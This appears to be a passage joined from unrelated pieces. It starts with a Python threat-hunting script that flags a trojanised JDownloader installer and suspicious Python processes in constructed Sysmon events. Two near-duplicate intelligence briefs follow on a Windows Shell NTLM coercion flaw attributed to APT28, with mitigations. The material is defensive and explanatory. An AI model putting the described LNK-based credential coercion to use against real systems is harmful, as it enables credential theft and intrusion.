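# Placeholder for the project's published SHA-256 manifest (constructed value, not a real hash).
KNOWN_GOOD_SHA256 = {"00" * 32}
USER_PROFILE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\", re.IGNORECASE)
# Assumed baseline: per-user CPython installs land here and are expected on developer hosts.
BASELINED_PYTHON = re.compile(r"\\AppData\\Local\\Programs\\Python\\", re.IGNORECASE)


def parse_hashes(field: str) -> dict[str, str]:
    """Split Sysmon's 'SHA256=...,MD5=...' Hashes field into {ALGO: hexdigest}."""
    pairs = (part.partition("=") for part in field.split(",") if "=" in part)
    return {algo.upper(): digest.lower() for algo, _, digest in pairs}


def hunt(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (rule, ATT&CK technique, Image) for every event matching a hunt rule."""
    hits = []
    for ev in events:
        image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
        base, pbase = ntpath.basename(image).lower(), ntpath.basename(parent).lower()
        is_python = fnmatch.fnmatch(base, "python*.exe")
        if fnmatch.fnmatch(base, "jdownloader*.exe"):
            sha = parse_hashes(ev.get("Hashes", "")).get("SHA256")
            if sha not in KNOWN_GOOD_SHA256:          # installer not in the published manifest
                hits.append(("jdownloader-installer-not-in-manifest", "T1195.002", image))
        if is_python and USER_PROFILE.match(image) and not BASELINED_PYTHON.search(image):
            hits.append(("python-interpreter-in-user-profile", "T1059.006", image))
        if is_python and fnmatch.fnmatch(pbase, "jdownloader*"):
            hits.append(("python-child-of-jdownloader", "T1059.006", image))
    return hits


# Constructed EID 1 records: one trojanised installer run, its Python child, a manifest-matching
# launcher, and a baselined per-user Python install that must not alert.
EVENTS = [
    {"UtcTime": "2026-05-07 09:12:01", "Image": r"C:\Users\alice\Downloads\JDownloader2Setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Hashes": "SHA256=" + "ff" * 32 + ",MD5=" + "ff" * 16},
    {"UtcTime": "2026-05-07 09:12:40", "Image": r"C:\Users\alice\AppData\Roaming\jd\python.exe",
     "ParentImage": r"C:\Users\alice\Downloads\JDownloader2Setup.exe", "Hashes": "SHA256=" + "ee" * 32},
    {"UtcTime": "2026-05-07 10:00:00", "Image": r"C:\Program Files\JDownloader\JDownloader2.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Hashes": "SHA256=" + "00" * 32},
    {"UtcTime": "2026-05-07 11:30:00", "Image": r"C:\Users\bob\AppData\Local\Programs\Python\Python312\python.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Hashes": "SHA256=" + "11" * 32},
]

if __name__ == "__main__":
    for rule, technique, image in hunt(EVENTS):
        print(f"{rule:40} {technique:10} {image}")
```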

CVE-2026-32202 — Windows Shell NTLM coercion / credential capture, APT28 active against EU governments (CISA KEV deadline 2026-05-12)

From CTI Daily Brief — 2026-05-08 · published 2026-05-08

A protection mechanism failure (CWE-693) in Windows Shell allows an unauthenticated, network-adjacent attacker to coerce outbound NTLM authentication from a target system after minimal user interaction with a crafted artefact (LNK file or similar Shell shortcut). When a user opens a directory containing the malicious artefact, the Shell resolves it and initiates an SMB connection to an attacker-controlled server, transmitting a NetNTLM credential hash. The attacker relays the hash for same-network lateral movement or cracks it offline to recover plaintext credentials. NVD CVSS is 4.3 (network vector, no privileges required, user interaction required), reflecting the coercion-only impact; in-the-wild exploitation and state-actor attribution make the operational risk materially higher.

Microsoft patched this in the April 2026 Patch Tuesday cycle. CISA added CVE-2026-32202 to KEV on 2026-04-28 with a deadline of 2026-05-12. Threat intelligence attributes active exploitation to APT28 (GRU Unit 26165, "Fancy Bear") targeting EU government ministries. The technique complements APT28's documented use of NTLM relay and pass-the-hash for lateral movement within government networks.

Immediate actions: Apply April 2026 Windows Patch Tuesday; block outbound TCP 445 to non-business internet destinations at the perimeter firewall; enable "Restrict NTLM" Group Policy (set to "Deny all") or migrate authentication to Kerberos-only where operationally feasible; monitor EDR for outbound 445/TCP to internet IPs from workstations.

CVE-2026-32202 — Windows Shell NTLM coercion, APT28 ITW (CVSS 4.3, CISA KEV deadline 2026-05-12)

From CTI Daily Brief — 2026-05-08 · published 2026-05-08

A crafted Windows Shell artefact (LNK shortcut) placed in a directory causes the victim host to initiate an outbound SMB authentication to an attacker-controlled server when the directory is opened, transmitting NetNTLM hashes. APT28 has weaponised this against EU government ministries. Despite the low NVD CVSS (4.3), KEV listing and state-actor ITW exploitation make this a priority-patch item. Apply April 2026 Windows cumulative updates. CISA KEV deadline: 2026-05-12.